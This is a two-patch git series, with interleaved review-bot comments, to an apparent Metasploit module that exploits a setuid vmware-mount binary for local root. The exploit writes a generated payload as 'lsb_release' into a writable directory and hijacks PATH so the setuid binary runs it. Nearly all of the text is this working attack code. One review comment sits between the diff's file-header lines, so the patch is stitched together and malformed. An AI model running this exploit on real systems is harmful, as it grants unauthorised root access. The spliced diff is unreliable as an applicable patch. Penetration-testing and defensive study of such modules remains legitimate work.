From 25ecf73d7d472a84fa5c50d6623c23203e585e0f Mon Sep 17 00:00:00 2001
From: Rasta Mouse
Date: Thu, 27 Nov 2014 17:12:37 +0000
Subject: [PATCH 1/2] Add configurable directory, rather than relying on the session working directory.
---
 modules/exploits/linux/local/vmware_mount.rb | 13 ++++++++-----
 1 file changed, 8 insertions(+), 5 deletions(-)
diff --git a/modules/exploits/linux/local/vmware_mount.rb b/modules/exploits/linux/local/vmware_mount.rb
index 17510b7118..cd089b38b6 100644
--- a/modules/exploits/linux/local/vmware_mount.rb
+++ b/modules/exploits/linux/local/vmware_mount.rb
@@ -53,6 +53,9 @@ class Metasploit4 < Msf::Exploit::Local
 'DisclosureDate' => "Aug 22 2013"
 }
 ))
+ register_options([
+ OptString.new("WritableDir", [ true, "A directory where you can write files.", "/tmp" ]),
+ ], self.class)
 end
 
 def check
@@ -68,13 +71,13 @@ class Metasploit4 < Msf::Exploit::Local
 fail_with(Failure::NotVulnerable, "vmware-mount doesn't exist or is not setuid")
 end
 
- write_file("lsb_release", generate_payload_exe)
-
- cmd_exec("chmod +x lsb_release")
- cmd_exec("PATH=.:$PATH /usr/bin/vmware-mount")
+ path = "#{datastore["WritableDir"]}"
+ write_file("#{path}/lsb_release", generate_payload_exe)
+ cmd_exec("chmod +x #{path}/lsb_release")
+ cmd_exec("PATH=#{path}:$PATH /usr/bin/vmware-mount")
 # Delete it here instead of using FileDropper because the original
 # session can clean it up
- cmd_exec("rm -f lsb_release")
+ cmd_exec("rm -f #{path}/lsb_release")
 end
 
 def setuid?(remote_file)
From 985838e999d0263679ec13a89f59813dadd1c288 Mon Sep 17 00:00:00 2001
From: Rasta Mouse
Date: Thu, 27 Nov 2014 21:38:50 +0000
Subject: [PATCH 2/2] Suggestions from OJ
---
 modules/exploits/linux/local/vmware_mount.rb | 13 +++++++------
 1 file changed, 7 insertions(+), 6 deletions(-)
diff --git a/modules/exploits/linux/local/vmware_mount.rb b/modules/exploits/linux/local/vmware_mount.rb
index cd089b38b6..93cb8106d5 100644
--- a/modules/exploits/linux/local/vmware_mount.rb
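Review bot: In the second hunk of PATCH 1/2 the operator-supplied `WritableDir` value is interpolated unescaped into the `cmd_exec` shell strings, so a directory name containing a space or a shell metacharacter makes `chmod +x` and, more seriously, `rm -f` act on paths other than the dropped file on the system under test. The rewritten lines in PATCH 2/2 keep the same pattern (`chmod +x #{lsb_path}`, `rm -f #{lsb_path}`, `PATH=#{datastore['WRITABLEDIR']}:$PATH`). Escaping the value where it enters the command, e.g. `cmd_exec("rm -f #{Shellwords.escape(lsb_path)}")` (plus `require 'shellwords'` if the framework does not already load it), or rejecting anything that is not a plain absolute path before the file is written, would prevent that. The enclosing method starts above the hunk, so any validation that already exists there is not visible here.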
+++ b/modules/exploits/linux/local/vmware_mount.rb
@@ -54,7 +54,7 @@ class Metasploit4 < Msf::Exploit::Local
 }
 ))
 register_options([
- OptString.new("WritableDir", [ true, "A directory where you can write files.", "/tmp" ]),
+ OptString.new("WRITABLEDIR", [ true, "A directory where you can write files.", "/tmp" ]),
 ], self.class)
 end
 
@@ -71,13 +71,14 @@ class Metasploit4 < Msf::Exploit::Local
 fail_with(Failure::NotVulnerable, "vmware-mount doesn't exist or is not setuid")
 end
 
- path = "#{datastore["WritableDir"]}"
- write_file("#{path}/lsb_release", generate_payload_exe)
- cmd_exec("chmod +x #{path}/lsb_release")
- cmd_exec("PATH=#{path}:$PATH /usr/bin/vmware-mount")
+ lsb_path = File.join(datastore['WRITABLEDIR'], 'lsb_release')
+ write_file(lsb_path, generate_payload_exe)
+ cmd_exec("chmod +x #{lsb_path}")
+ cmd_exec("PATH=#{datastore['WRITABLEDIR']}:$PATH /usr/bin/vmware-mount")
 # Delete it here instead of using FileDropper because the original
 # session can clean it up
- cmd_exec("rm -f #{path}/lsb_release")
+ cmd_exec("rm -f #{lsb_path}")
+
 end
 
 def setuid?(remote_file)
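Review bot: The second hunk of PATCH 2/2 adds an empty line directly before the method's closing `end` and looks up `datastore['WRITABLEDIR']` twice, once for `File.join` and again inside the `PATH=` string. Binding it once, `writable_dir = datastore['WRITABLEDIR']`, then using `File.join(writable_dir, 'lsb_release')` and `"PATH=#{writable_dir}:$PATH /usr/bin/vmware-mount"`, keeps the two uses from drifting apart, and the stray blank line can be dropped. The option key is also written with double quotes in `register_options` but single quotes here; picking one style would be tidier. The method's opening lines are outside the hunk.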